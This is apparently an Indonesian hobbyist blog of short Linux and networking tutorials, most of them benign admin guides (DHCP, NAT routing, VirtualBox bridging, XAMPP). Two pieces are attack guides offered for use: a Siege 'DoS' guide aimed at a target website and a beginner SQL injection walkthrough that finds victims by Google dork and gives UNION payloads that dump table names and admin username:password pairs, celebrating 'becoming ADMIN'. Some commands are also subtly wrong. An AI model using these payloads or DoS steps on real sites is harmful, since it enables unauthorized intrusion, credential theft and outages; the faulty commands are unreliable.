Dos Sederhana dengan Siege 7

Assalamu'alaikum :)

kali ini saya akan memberikan sedikit tutorial tentang Siege 7, kalo ada yang belum tau dengan Siege 7, search dulu aja deh . hehehe

sebelum kita ke TKP, kita harus install Siege7, berikut cara penginstalannya :

1. Download difilenya disini .
2. jika sudah terdownload, buka terminal, sudo dpkg -i siege_2.70-1_i386.deb
3. tunggu hingga selesai
4. jika sudah terinstall, konfigurasi dulu siege7 nya, caranya :
    -  /usr/bin/siege.conf
5. siege 7 siap di pakai, berikut cara pakainya :
    - siege -i <website target>

6. jreeeenggg, kira-kira begini screenshoot website
sesudah kita Dos dengan Siege 7 :)

:D




sumber : IBTeam, Rndc.

Menutup Port di Ubuntu

assalamu'alaikum wr.wb

untuk tutorial kali ini saya akan sedikit menjelaskan tentang  security internet dasar, banyak kita lihat dari tutorial-tutorial hacking exploit yang beredar, mereka mencari celah dari port-port yang terbuka untuk bisa meng-exploitkan system kita. jadi disini saya akan membagi tutorial untuk mencegah exploit tersebut dengan menutup port-port yang terbuka.

langsung aja ke tekape gaaannn....

1. kita memerlukan tools nmap & netsat, nmap berguna untuk melakukan Scanning, sedangkan netstat adalah tools untuk mengetahui traffic dalam jaringan, namun disini saya mengfungsikan netstat sebagai    penutup port yang terbuka

2. buka terminal, ketik $ nmap 127.0.0.1  (127.0.0.1--> IP default untuk laptop kita)
    setelah di enter maka akan terlihat seperti ini :


3. pilih port mana yang ingin kita tutup, disini saya akan menutup port 3001/tcp nessus
4. buka terminal lain lagi dan ketik : $ netstat -lpn | grep 3001




5. terlihat ada 1716/thin server, itu adalah server yg berjalan di port 3001, kita close aja dengan cara :
    $ kill 1716

6. coba kita scanning lagi dengan nmap, port 3001 sudah tertup





Oke, terima kasih semoga bermanfaat...


refrensi : Indonesiabacktrak, Rndc.

cara membuat 2 access point dalam satu jaringan di Ubuntu

cara membuat 2 access point dalam satu jaringan di Ubuntu :

disini saya akan menjelaskan cara mereset router dengan media OS Ubuntu :

pertama yang harus di lakukan adalah :
1. tekan tombol di belakang router, disitu ada tulisan reset, kemudian tahan beberapa saat, hingga lampu hijau di bagian depan router tidak berkedip.
2. sambung kan kabel lan dari router ke leptop ada
3. untuk di OS Ubuntu kita harus masuk terminal, kemudian masuk ke root : $ sudo su
4. setting IP di eth0 : $ ifconfig eth0 192.168.1.2
5. buka web browser, kemudian ketik IP default dari router, disini saya memakai acces point ber-tipe DD-WRT, IP default ---> 192.168.1.1
6. setelah jalan, maka akan tampil form login, biasanya username : admin dan password : admin
7. kemudian akan muncul di halaman wirelles konfigurasi
8. untuk konfigurasi nya sebagai berikut, saya akan menyediakan gambar nya

sesudah mengikuti apa yang ada di gambar, restart kembali leptop kita. :) selesai !

refrensi : http://www.wikihow.com , EKA, TASMIN, IWAN :)

Setting interface VirtualBox di Ubuntu

Setting interface di VirtualBox di Ubuntu:

sebelumnya kita harus install package ini uml-utilities bridge-utils.
cara install nya :
$ sudo apt-get install uml-utilities bridge-utils

sekarang kita edit di mesin interface nya :
$ sudo gedit /etc/network/interfaces

copy paste text ini ke geditnya :

auto eth0
    iface eth0 inet manual

    auto br0
    iface br0 inet static
    address 192.168.0.100
    netmask 255.255.255.0
    gateway 192.168.0.1
    bridge_ports eth0 vbox0 vbox1

    # The loopback network interface
    auto lo
    iface lo inet loopback

kemudian save dan exit.

setelah mengikuti petunjuk di atas, kita perlu minta perijinan di networking OS nya :

$ sudo chown root:vboxusers /dev/net/tun
$ sudo chmod g+rw /dev/net/tun

kemudian restart lagi :)

konfigurasi di virtualbox,

1. Buka virtualBox nya
2. Klik setting
3. Pilih tab network
4. Pilih Bridge-Adapter di comboBox Attached
5. dan yang di bawahnya pilih br0

Install metasploit di Ubuntu

Install metasploit di Ubuntu :

1. Download file nya di disini
2. install dengan cara :
   a). buka terminal, masuk ke root : $ sudo su
   b). masuk ke direktori metasploit yang telah  di download, contoh :
       $ cd /home/arik/Download
   c). sudah ketemu filenya
   d). kemudian ketik di terminal : $ chmod +x namafile.run
   e). $ ./namafile.run

selesai :)

install dan Konfigurasi DHCP server di Ubuntu

DHCP server di Ubuntu :
   
    Dynamic Host Configuration Protocol adalah protokol yang berbasis arsitektur client/server yang dipakai untuk memudahkan pengalokasian alamat IP dalam satu jaringan. Sebuah jaringan lokal yang tidak menggunakan DHCP harus memberikan alamat IP kepada semua komputer secara manual. Jika DHCP dipasang di jaringan lokal, maka semua komputer yang tersambung di jaringan akan mendapatkan alamat IP secara otomatis dari server DHCP. Selain alamat IP, banyak parameter jaringan yang dapat diberikan oleh DHCP, seperti default gateway dan DNS server.

disini saya akan menjelaskan cara install & konfigurasi dhcp3-server di Ubuntu :


1.kita instal dhcp3-server di Ubuntu dengan cara : $ sudo apt-get install dhcp3-server

2.setting dhcp config nya : $ nano /etc/dhcp3/dhcpd.conf
copy-paste text berikut :

subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.10 192.168.1.200;
option domain-name-servers 202.130.0.155;
option domain-name "l0g.Net";
option routers 192.168.1.1;
}

ket : disini saya setting ip client dari 10 s/d 200

3.restart dhcp-server nya : $ dhcpd restart


untuk memastikan apakah dhcp-nya berjalan sesuai dengan yang kita inginkan, kita langsung praktek aja, :

1.siapkan 2 buah leptop
2.kabel lan

untuk leptop pertama, saya jadikan router & leptop yang kedua saya jadikan client. syarat leptop pertama adalah sudah terinstall dhcp server & wi-fi sudah aktif dan bisa connect ke google, untuk leptop yang client tidak ada persyaratan, cuman mharus menggunakan OS linux, berikut caranya :

laptop 1 :
1.buka terminal, masuk ke root : $ sudo so
2.setting ip, $ ifconfig eth0 192.168.1.1 ---> ip kita harus sama seperti di dhcpd.conf (option router)
3.jalankan dhcpnya : $ dhcpd start

laptop client :
1.buka terminal, masuk ke root : $ sudo do
2.request dhcp nya : $ dhclient eth0 -v



sesudah masukkan perintah di atas kita kembali lagi ke laptop 1:
1.ip forward : $ echo "1" > /proc/sys/net/ipv4/ip_forward
2.iptables : $ iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o wlan0 -j MASQUERADE

laptop client :
1.ping google.com




kalo tidak ada pesan error, atau proses ping ke google berjalan lancar, maka dhcp nya berjalan dengan lancar :)

terimakasih.





Sumber : Eka Saputra, Ikhwani Saputra, Hertasmin, RNDC

Install & Konfigurasi Conky

install Conky di ubuntu 12.04 :

1. buka terminal, masuk ke root : --> sudo su
2. ketikkan sudo apt-get install conky
3. tunggu beberapa saat..
4. install completed



konfigurasi Conky :

1.buka terminal
2.ketik --> sudo gedit /etc/conky/conky.conf
3.source nya sialkan Download disini
4.copy-paste source nya, trus save.
5.buka conky, alt+F2 ketik conky

Membuat Router-Client dengan OS Linux

Membuat router-client di Ubuntu :

sediakan :
1.kabel LAN
2.dua buah laptop dengan OS linux

ayo langsung ke TKP :

1.sambungkan kedua lan tersebut ke laptop
2.seting di laptop untuk router :
 a). buka terminal masuk ke root dengan ketik : sudo su
 b). ketik -->ifconfig eth0 192.168.1.3/24 (untuk gateway client)
 c). setelah itu setting DNS degan cara --> echo "nameserver 8.8.8.8" > /etc/resolv.conf (disini saya menggunakan DNS google)
 d). setting ip forward --> echo "1" > /proc/sys/net/ipv4/ip_forward
 e). kemudian ketik --> iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

3.setting di laptop client :
 a). buka terminal masuk ke root lagi
 b). ifconfig eth0 192.168.1.4/24 (disini harus menggunakan segmen yang sama yaitu "1")
 c). kemudian --> route add default gw 192.168.1.3 (ip nya ke laptop router)
 d). setting DNS laptop client --> echo "nameserver 8.8.8.8" > /etc/resolv.conf

4.tes ping ke google.com

List GoogleDork

share list googleDork Download disini



sumber : www.breakthesecurity.com/2010/12/hacking-website-using-sql-injection.html

INSTALL XAMPP DI Ubuntu

INSTALL XAMPP di Ubuntu

1.Download file nya di Xampp Download

2. Setelah download selesai, Move dulu file xampp tadi ke direktori Home biar lebih mudah...

3. Buka terminal anda, lalu masukkan ke root :~$ sudo su

4. Ekstrak file tar xampp ke direktori /opt, dengan cara :- tar xvfz xampp-linux-1.8.0.tar.gz -C /opt

5. Tunggu sampai selesai,kemudian tinggal jalankan xampp tersebut,dengan cara : /opt/lampp/lampp start

6. jika sudah,tutup terminal anda, terus buka firefox anda ! Lalu ketikkan : localhost/xampp

SQL INJECTION PEMULA

     SQL injection adalah suatu istilah trik sederhana yang paling sering di gunakan oleh para h**ker untuk mengambil username & password sebuah website. Dan ini adalah sedikit tutorial dari saya untuk anda :)

tanpa banyak intermezzo let's go ke TKP :

yang perlu di siapkan sebelum menginjeksi :

 - Firefox
 - plugin hackbar di mozzila (ini untuk mengkonversikan String menjadi Hexa)
 - target website   


1.pertama kita cari target yang ingin di injek dengan cara googleDork:
  
  - googleDork : inurl: "product.php?id="

  (disini target saya : www.sasaran.com/index.php?id=130 )

2.Setelah itu, kita cari kelemahan webiste nya dengan cara memberikan tanda petik satu/quote ' di ujung URL,
 
  - www.sasaran.com/index.php?id=130'

jika ada kelemahan maka akan muncul tulisan seperti ini :

_query error: Resource id #3You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by id' at line 1

3. kemudian kita cari jumlah kolom :

 - www.sasaran.com/index.php?id=-130+order+by+1--
 (cari dimana pesan errornya,jika pesan error nya tidak muncul, cari lagi hingga muncul pesan error)

 - www.sasaran.com/index.php?id=-130+order+by+1--
 - www.sasaran.com/index.php?id=-130+order+by+2--
 - www.sasaran.com/index.php?id=-130+order+by+3--
 - www.sasaran.com/index.php?id=-130+order+by+4--
 - www.sasaran.com/index.php?id=-130+order+by+5--
 
 Unknown column ’5′ in ‘order clause’ <------------ nih pesan errornya

(naahhh muncul pesan errornya)

4. jika errornya muncul pada angka 5, jadi jumlah kolomnya 5-1= 4 :D ...

5. cek lagi kolom yang bisa di injek :
   - www.sasaran.com/index.php?id=-130+union+select+1,2,3,4--
    misalnya muncul angka, 1, 3 (nggak harus 1 & 3 yang muncul).

6. pilih salah satu angkanya disini saya pilih angka 3. kemudian cek mysql yang di pakai website tersebut :

 - www.sasaran.com/index.php?id=-130+union+select+1,2,version(),4--
   (ganti angka yang kita pilih dengan "version()" )
 - nih pesannya : "5.0.95-community"
7. bearti wesite tersebut menggunakan mysql versi 5, mysql versi 5 lebih mudah kita injek, untuk versi 4 mungkin lebih susah :)

8. kita cek lagi, (bosan ya nge-Cek terus).. hehhe, cek jumlah tabel dari databasenya dengan menambah kan "group_concat(table_name)" di angka  yang kita pilih tadi :

 - www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4--

 - jangan lupa tambahkan juga "from+information_schema.tables+where+table_schema=database()--" jadi di URL nya seperti ini :
 - www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4 +from+information_schema.tables+where+table_schema=database()--

9. jreeeeeenngggggggggg, muncul nama tabelnya : "

"tbl_user,tbl_barang,tbl_penjual"
10. lihat tabel  mana yang menarik untuk anda lihat : (pastinya tabel tbl_user)
    sebelum kita ke step selanjutnya, kita convert dulu "tbl_user" ke hexadecimal, untuk cara mengkonvertnya cari di google :)

- www.sasaran.com/index?php=-130+union+select+group_concat(column_name,0x3a)from+information_schema.columns+where+table_name=0x61646d696e--
naaahhh, muncul deh kolom-kolom dari tabel "tbl_user" :
misalnya ada muncul kolom USERNAME & PASSWORD

11. Ayo kita bongkar lagi kolom username & password nya :)

- www.sasaran.com/index.php?id=-130+union+select+group_concat(username,0x3a,password)from+admin--

12. jeeeeng jeeeeeeeeenggg.... muncul deh username & passwordnya selamat menjadi ADMIN :)